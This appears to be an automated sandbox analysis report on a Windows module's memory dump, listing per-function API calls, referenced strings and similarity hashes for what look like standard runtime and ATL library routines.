Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$CriticalInfoSection$Leave$CursorEnterLoadRegister
String ID: ATL:%p
API String ID: 269841140-4171052921
Opcode ID: fac8e609b0a826edc1caf4eedfbf0751043d6124d76726f670857153b4e178d8
Instruction ID: a073940a545860a6b8e18e2a654649c8392ff54cd25ce5bcfc4a976e70c4d2db
Opcode Fuzzy Hash: fac8e609b0a826edc1caf4eedfbf0751043d6124d76726f670857153b4e178d8
Instruction Fuzzy Hash: 1171C030904B059BDB20DFA9C6446AAB7F8FF99718B14465DE84A97750EB30F984CF42

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B5570, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

__Getcvt.LIBCPMT ref: 6E9B55AE
__Getcvt.LIBCPMT ref: 6E9B55D3

Strings

false, xrefs: 6E9B5630
true, xrefs: 6E9B5669

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Getcvt
String ID: false$true
API String ID: 1921796781-2658103896
Opcode ID: a84448faf572d9be896668696ee6b7956938b3a0c04c79adcaa4e8be6d3e4f32
Instruction ID: c890085b9e473414e2b085667ce142b1df952b106e8cbeec6133e811f97f5c49
Opcode Fuzzy Hash: a84448faf572d9be896668696ee6b7956938b3a0c04c79adcaa4e8be6d3e4f32
Instruction Fuzzy Hash: 7B514131A042458FDB148FA8C8407ABBBFAEF95714F1484AED8455B385CB76E901CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C1130, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107timeCOMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 6E9C1148
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6E9C1175
MulDiv.KERNEL32(00000008,00000000), ref: 6E9C117E
CreateFontW.GDI32(00000000), ref: 6E9C1187
ReleaseDC.USER32 ref: 6E9C1194
SetTimer.USER32 ref: 6E9C11A9

Part of subcall function 6E9C2460: BeginPaint.USER32(?,?), ref: 6E9C24A3
Part of subcall function 6E9C2460: GetParent.USER32(?), ref: 6E9C24AC
Part of subcall function 6E9C2460: GetClientRect.USER32 ref: 6E9C24C2
Part of subcall function 6E9C2460: CreateCompatibleDC.GDI32(?), ref: 6E9C24C8
Part of subcall function 6E9C2460: CreateCompatibleBitmap.GDI32(?,?,?), ref: 6E9C24EA
Part of subcall function 6E9C2460: SelectObject.GDI32(00000000,00000000), ref: 6E9C24F6
Part of subcall function 6E9C2460: SelectObject.GDI32(00000000,?), ref: 6E9C2508
Part of subcall function 6E9C2460: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6E9C2521
Part of subcall function 6E9C2460: SendMessageW.USER32(?,0000000F,?,00000000), ref: 6E9C252F
Part of subcall function 6E9C2460: SetBkMode.GDI32(?,00000001), ref: 6E9C2538
Part of subcall function 6E9C2460: SetTextColor.GDI32(?,00FFFFFF), ref: 6E9C2544
Part of subcall function 6E9C2460: GetClientRect.USER32 ref: 6E9C2556
Part of subcall function 6E9C2460: ClientToScreen.USER32(?,?), ref: 6E9C2564
Part of subcall function 6E9C2460: ClientToScreen.USER32(?,?), ref: 6E9C2579
Part of subcall function 6E9C2460: ClientToScreen.USER32(?,?), ref: 6E9C259B

DeleteObject.GDI32(?), ref: 6E9C11D0

Strings

Arial, xrefs: 6E9C114E

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Client$CreateObjectScreen$CompatibleMessageRectSelectSend$BeginBitmapCapsColorDeleteDeviceFontModePaintParentReleaseTextTimer
String ID: Arial
API String ID: 1525433823-493054409
Opcode ID: 0f815db8008387dbd487df5daaa1a0f832c317d0248c66be8a7936c13667621b
Instruction ID: 3322db368cbdde0e0d2f15005706738aaa3ca7bf495d9ee2f033f2c3da7217fc
Opcode Fuzzy Hash: 0f815db8008387dbd487df5daaa1a0f832c317d0248c66be8a7936c13667621b
Instruction Fuzzy Hash: EC312371200705AFEB60AF69CC45BAA77B8FF56712F004112F205CA2D4C7B5E865CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C87A0, Relevance: 15.2, APIs: 10, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,6E9B8D25,6E9B8D27,00000000,00000000,7BDA3107,?,00000000,?,Function_00019350,6E9FCEB8,000000FE,?,6E9B8D25), ref: 6E9C8814
MultiByteToWideChar.KERNEL32(00000000,00000000,6E9B8D25,?,00000000,00000000,?,Function_00019350,6E9FCEB8,000000FE,?,6E9B8D25), ref: 6E9C888F
SysAllocString.OLEAUT32(00000000), ref: 6E9C889A
_com_issue_error.COMSUPP ref: 6E9C88DF
GetLastError.KERNEL32(80070057,7BDA3107,?,00000000,?,Function_00019350,6E9FCEB8,000000FE,?,6E9B8D25), ref: 6E9C88E4
_com_issue_error.COMSUPP ref: 6E9C88F7
_com_issue_error.COMSUPP ref: 6E9C8901
GetLastError.KERNEL32(8007000E,00000000,?,00000000,?,Function_00019350,6E9FCEB8,000000FE,?,6E9B8D25), ref: 6E9C8917
_com_issue_error.COMSUPP ref: 6E9C892A
_com_issue_error.COMSUPP ref: 6E9C8934

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 44e210379dcf0e85d99c9b956e63ae37b6e10d08ed88c64d5f87c2adeff4d6ad
Instruction ID: c8797cff4f1a99e5b3c3684769dd617f4b6fc2f00339c986432577cc073864a5
Opcode Fuzzy Hash: 44e210379dcf0e85d99c9b956e63ae37b6e10d08ed88c64d5f87c2adeff4d6ad
Instruction Fuzzy Hash: D141E7B1A00305ABDB24AFE4C844BEEBBACFF85B54F104629E519A7640D734F5018FA7

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DA174, Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E9DA188

Part of subcall function 6E9D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BAE
Part of subcall function 6E9D9B98: GetLastError.KERNEL32(6E9D6995,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BC0

_free.LIBCMT ref: 6E9DA194
_free.LIBCMT ref: 6E9DA19F
_free.LIBCMT ref: 6E9DA1AA
_free.LIBCMT ref: 6E9DA1B5
_free.LIBCMT ref: 6E9DA1C0
_free.LIBCMT ref: 6E9DA1CB
_free.LIBCMT ref: 6E9DA1D6
_free.LIBCMT ref: 6E9DA1E1
_free.LIBCMT ref: 6E9DA1EF

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1567567169814c5e057229a9b52f9fb2605f0be1630a17eeeb2b7d37ce57e67d
Instruction ID: dacce6813a5574f76fb3d9cfabf344dbc321cd5b6baa29ecfdee57616fcb1dc3
Opcode Fuzzy Hash: 1567567169814c5e057229a9b52f9fb2605f0be1630a17eeeb2b7d37ce57e67d
Instruction Fuzzy Hash: 8111F876510918BFCB01EF98C850CED3BA9EF59254B4288A1FA089F220DB75DE54DF80

Uniqueness

Uniqueness Score: -1.00%

Function 6E9BE310, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 100libraryloaderregistryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,7BDA3107,?,?,?,6E9E9A60,000000FF), ref: 6E9BE349
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 6E9BE359
GetModuleHandleW.KERNEL32(Advapi32.dll,7BDA3107,?,?,?,6E9E9A60,000000FF), ref: 6E9BE3B9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 6E9BE3C9
RegDeleteKeyW.ADVAPI32(?,?), ref: 6E9BE418

Strings

RegDeleteKeyTransactedW, xrefs: 6E9BE353
RegDeleteKeyExW, xrefs: 6E9BE3C3
Advapi32.dll, xrefs: 6E9BE344, 6E9BE3B4

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc$Delete
String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
API String ID: 2668475584-1053001802
Opcode ID: 33803ad6e955409d4c957690106048a42eda19bea810b4ff6da7edbd718711fe
Instruction ID: 6d5f27fa46ea086e5da21b06cd32a1501fe49f499ca41b19771ac327e029c4d6
Opcode Fuzzy Hash: 33803ad6e955409d4c957690106048a42eda19bea810b4ff6da7edbd718711fe
Instruction Fuzzy Hash: 0F31C3B6608709EFDB218F89D800FAABBACEF45721F00416EED2596750D736E451CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B9100, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6E9B9149
VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 6E9B9171
VariantClear.OLEAUT32(?), ref: 6E9B9189

Part of subcall function 6E9B8E70: SysFreeString.OLEAUT32(?), ref: 6E9B8ECE
Part of subcall function 6E9B8E70: SysAllocString.OLEAUT32(?), ref: 6E9B8F39

_com_issue_error.COMSUPP ref: 6E9B91AF

Strings

counter, xrefs: 6E9B963B, 6E9B9666
page, xrefs: 6E9B99EB, 6E9B9A16
name, xrefs: 6E9B9248
value, xrefs: 6E9B93D0

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$String$AllocChangeClearFreeInitType_com_issue_error
String ID: counter$name$page$value
API String ID: 2722580932-1733285648
Opcode ID: 135c4fcf86a14a29c1a1fa6e4fd81809d03ce96df0a3ae1d7474f60e8031d63b
Instruction ID: e99376965afcc122c3393b9c9836bc1092255f0ed829884fcc50d872ec02bb33
Opcode Fuzzy Hash: 135c4fcf86a14a29c1a1fa6e4fd81809d03ce96df0a3ae1d7474f60e8031d63b
Instruction Fuzzy Hash: 8E114C71A1460AABDB20DFA4C908BDEB7BCFF59714F20456AE915A3240E735E904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C829B, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,6E9C85E0,6EA00D10,C000008C,?,?,6E9C30BC,?,7BDA3107,00000000,00000000,6E9E98D0,000000FF), ref: 6E9C82AD
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,6E9C85E0,6EA00D10,C000008C,?,?,6E9C30BC,?,7BDA3107,00000000,00000000), ref: 6E9C82C2
DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,000000FF), ref: 6E9C833E

Strings

AtlThunk_FreeData, xrefs: 6E9C8318
AtlThunk_InitData, xrefs: 6E9C82EA
atlthunk.dll, xrefs: 6E9C82BD
AtlThunk_DataToCode, xrefs: 6E9C8301
AtlThunk_AllocateData, xrefs: 6E9C82D3

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: 8ef71dbdd1e46dc0a728a620fc9df2e41eb4634e06653c4b815c1e5e4e3ae483
Instruction ID: 0bb3770584f1a4a43107c8a294f74af3ec19ba64f8c6ace7e53a39e83d7e9ebc
Opcode Fuzzy Hash: 8ef71dbdd1e46dc0a728a620fc9df2e41eb4634e06653c4b815c1e5e4e3ae483
Instruction Fuzzy Hash: 3C01C4309056157FDE766ED09C44BC93F596F92A4DF000450FD047A285FB22F9068DB7

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E128E, Relevance: 13.8, APIs: 9, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aaf39abc63d98bf7be7a3c8c2fa15d3d6af7a849ba82ec77cafdd46698a0f8d
Instruction ID: 43c4722399307ebebd71d7779fe7f6d53c2fac0e4cd9bc5357f1ea38a884ddde
Opcode Fuzzy Hash: 4aaf39abc63d98bf7be7a3c8c2fa15d3d6af7a849ba82ec77cafdd46698a0f8d
Instruction Fuzzy Hash: B5C1C174A043499FDB028FEAC850BEDBBB8AF5B304F048549D654A7782D734D949CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DA294, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E9CED16,6E9FD0A0,0000000C,00000004,00000001,00000004,?,6E9B4865,00000000,00000000), ref: 6E9DA298
_free.LIBCMT ref: 6E9DA2EF
_free.LIBCMT ref: 6E9DA323
SetLastError.KERNEL32(00000000,?,?,?,00000000,FFFFFFFF,000000FF,?,6E9B4865,00000000,00000000), ref: 6E9DA330
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E9B4865,00000000,00000000), ref: 6E9DA33C
_abort.LIBCMT ref: 6E9DA342

Strings

ios_base::failbit set, xrefs: 6E9DA296

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free$_abort
String ID: ios_base::failbit set
API String ID: 3160817290-3924258884
Opcode ID: c931a47bc80776d1ed716b689a36b9b54ca652a155a7c010c3c2dc76d84fce62
Instruction ID: 8a7b4ab69253bb2aded2dee62ed57f067a58b4a7fea2482c148e9d0ef49aca48
Opcode Fuzzy Hash: c931a47bc80776d1ed716b689a36b9b54ca652a155a7c010c3c2dc76d84fce62
Instruction Fuzzy Hash: D211003164CE3227D6511AF99C54AB9272D9FE3679B248A10FA34911C8FF61C51D8E10

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C83A7, Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6E9C8550,00000000), ref: 6E9C83CB
HeapAlloc.KERNEL32(00000000), ref: 6E9C83D2

Part of subcall function 6E9C849D: IsProcessorFeaturePresent.KERNEL32(0000000C,6E9C83B9,00000000,?,6E9C8550,00000000), ref: 6E9C849F

InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,6E9C8550,00000000), ref: 6E9C83E2
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 6E9C8409
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000), ref: 6E9C841D
InterlockedPopEntrySList.KERNEL32(00000000), ref: 6E9C8430
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E9C8443

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
String ID:
API String ID: 2460949444-0
Opcode ID: 450a0662f01997cbcfca42c5743bc8a7edc1769922365979fd3d6a20401a35c9
Instruction ID: a9978c3571aa07f9b8b7581486ece538738fc97783c7eb3c26e8782ab55967e2
Opcode Fuzzy Hash: 450a0662f01997cbcfca42c5743bc8a7edc1769922365979fd3d6a20401a35c9
Instruction Fuzzy Hash: 6F119371645F12BBEA312BA58C48F6A366DEF46B56F014824FA05E6244EB20EC014AB3

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C0AC0, Relevance: 10.8, APIs: 7, Instructions: 267COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6EA01478,7BDA3107), ref: 6E9C0B1D
GetModuleFileNameW.KERNEL32(?,00000104), ref: 6E9C0BA4
LoadTypeLib.OLEAUT32(?,00000000), ref: 6E9C0BD5
LoadRegTypeLib.OLEAUT32(6E9F9538,00000000,00000000,?,00000000), ref: 6E9C0BFD
EnterCriticalSection.KERNEL32(6EA01494), ref: 6E9C0DC0
LeaveCriticalSection.KERNEL32(6EA01494), ref: 6E9C0DD6

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLoadType$FileLeaveModuleName
String ID:
API String ID: 1976781235-0
Opcode ID: 02ed010dffabb5bdad8aec1b145334d0b374d960946d26fa4c2de41514b14586
Instruction ID: 1b42a15af1bdbeb27d63ff0a1803d25a3233db0feffd834d5edfbd5958637961
Opcode Fuzzy Hash: 02ed010dffabb5bdad8aec1b145334d0b374d960946d26fa4c2de41514b14586
Instruction Fuzzy Hash: 3DB191B4905319EFDB60DBA4C858B99BBB8AF49708F1444D9E809EB340E734EE45CF52

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E49E1, Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E9E4A50
_free.LIBCMT ref: 6E9E4A5E
_free.LIBCMT ref: 6E9E4B8C
_free.LIBCMT ref: 6E9E4B97

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ae21ce480d99d5cdfa1f8e13824fa50e4e5b0f224deef1ec233ec2d16e06b6b0
Instruction ID: 1c2a7368b15780543e0be1db995eecbc32efb3c8f42bf0c76889086f1ac582b5
Opcode Fuzzy Hash: ae21ce480d99d5cdfa1f8e13824fa50e4e5b0f224deef1ec233ec2d16e06b6b0
Instruction Fuzzy Hash: BD61D171904615AFDB11CFE8C841B9EBBF9EF45720F2485AAEA54EB280E770D942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C3DA0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 196COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(6E9B0000,?,00000104), ref: 6E9C3E7D
GetModuleHandleW.KERNEL32(00000000), ref: 6E9C3EF7

Strings

REGISTRY, xrefs: 6E9C4030
APPID, xrefs: 6E9C3E3D
Module, xrefs: 6E9C3FA2
Module_Raw, xrefs: 6E9C3FD3

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$FileHandleName
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 4146042529-2529269209
Opcode ID: 05467529637e4eff65978d0248b53d3389d8c1044e3ac2bf45571e0263683be2
Instruction ID: d84ccc18de38e94a759bb51ee312778cd52abef407217cfd8710c725a2893b48
Opcode Fuzzy Hash: 05467529637e4eff65978d0248b53d3389d8c1044e3ac2bf45571e0263683be2
Instruction Fuzzy Hash: 6F71C7759002199BDB64EFA4CC54BDA737CAF95714F0005E9D80AAB640DB74DE45CF83

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C03B0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(6E9B0000,?,00000104), ref: 6E9C048D
GetModuleHandleW.KERNEL32(00000000), ref: 6E9C0507

Strings

REGISTRY, xrefs: 6E9C063D
APPID, xrefs: 6E9C044D
Module, xrefs: 6E9C05B2
Module_Raw, xrefs: 6E9C05DF

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$FileHandleName
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 4146042529-2529269209
Opcode ID: 13c240f21eb2e3bd5dac9e287eb0de0ce167b482d6ed777891611313872ddad6
Instruction ID: e967e00ed5154a7572a52ea35ec6f508920e95753040bff0d7e94eac073e94f2
Opcode Fuzzy Hash: 13c240f21eb2e3bd5dac9e287eb0de0ce167b482d6ed777891611313872ddad6
Instruction Fuzzy Hash: 216171759006199BDB64DF90CC50BEE737CAF95B14F4005A9D80AA7680EB74DE84CF93

Uniqueness

Uniqueness Score: -1.00%

Function 6E9BEBD0, Relevance: 10.7, APIs: 7, Instructions: 162libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000060), ref: 6E9BEC5D
LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 6E9BEC6F
FindResourceW.KERNEL32(00000000,?,?), ref: 6E9BEC96
LoadResource.KERNEL32(00000000,00000000), ref: 6E9BECAE

Part of subcall function 6E9BE270: GetLastError.KERNEL32(6E9BED79), ref: 6E9BE270

FreeLibrary.KERNEL32(00000000,00000000,?), ref: 6E9BED9F

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$Resource$ErrorFindFreeLast
String ID:
API String ID: 328770362-0
Opcode ID: 5747d9b340947d36fe613bbef0e927c6eb87f01abc7ca9a30dd214eac0d2ba39
Instruction ID: cc5d55ccd1da673690b6fd63bf4d8c0fc7b0cef766e78712dd0953707ef75266
Opcode Fuzzy Hash: 5747d9b340947d36fe613bbef0e927c6eb87f01abc7ca9a30dd214eac0d2ba39
Instruction Fuzzy Hash: 0A51CDB1A0071DAFDB20CB94CC44B9EB7BCEF89714F5005A9EA09A7240DB70EA448F59

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DFABC, Relevance: 10.7, APIs: 7, Instructions: 160fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,6E9E024E,?,?,?,?,?), ref: 6E9DFAFE
__fassign.LIBCMT ref: 6E9DFB80
__fassign.LIBCMT ref: 6E9DFB9F
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6E9DFBCC
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,6E9E024E), ref: 6E9DFBEB
WriteFile.KERNEL32(?,?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6E9E024E), ref: 6E9DFC24

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: da3931c13c8f1a53e7bc84441949c5f3cf52ca4bf00105bd5a821ae7ac1b272e
Instruction ID: 19ebbc94c3a721959647d6ad2e1f67967b401c65645cab3c5b59f4f4e42261e3
Opcode Fuzzy Hash: da3931c13c8f1a53e7bc84441949c5f3cf52ca4bf00105bd5a821ae7ac1b272e
Instruction Fuzzy Hash: EE51A170904A599FDB10CFE8C891AEEBBF8EF19304F24851AE955E7250E730EA55CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C9350, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6E9C937B
___except_validate_context_record.LIBVCRUNTIME ref: 6E9C9383
_ValidateLocalCookies.LIBCMT ref: 6E9C9411
__IsNonwritableInCurrentImage.LIBCMT ref: 6E9C943C
_ValidateLocalCookies.LIBCMT ref: 6E9C9491

Strings

csm, xrefs: 6E9C9426

Memory Dump Source

